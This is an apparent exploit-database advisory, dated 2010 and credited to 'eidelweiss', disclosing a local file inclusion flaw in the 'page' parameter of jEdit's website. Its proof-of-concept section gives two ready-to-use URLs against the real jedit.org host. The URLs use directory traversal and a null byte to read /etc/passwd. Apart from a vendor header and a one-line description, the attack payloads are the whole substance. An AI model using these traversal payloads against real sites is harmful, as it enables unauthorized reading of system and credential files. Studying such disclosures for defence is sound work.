id: 11691
date: 04/09/2010
title: jEdit (index.php?page) Local File Inclusion Vulnerability
author: eidelweiss
cves: 

=========================================================
jEdit (index.php?page) Local File Inclusion Vulnerability
=========================================================

[+]Vendor: 	jEdit
[+]Version: 	-
[+]License: 	GNU / GPL 2.0
[+]Homepage:	http://jedit.org/
[+]Risk: 	High
[+]Remote:	No
[+]Local:	Yes

###########################################################
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com
[+]Thank`s:	sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r.com)
###########################################################

####################


-=[Description]=-


jEdit is a mature programmer's text editor with hundreds (counting the time developing plugins) of person-years of development behind it.

####################

		-= P0C =-


	http://jedit.org/index.php?page=download../../../../../../etc/passwd%00
	
	http://jedit.org/index.php?page=../../../../../../etc/passwd%00

	

####################=[E0F]=####################




#  0day.today [2023-03-23]  #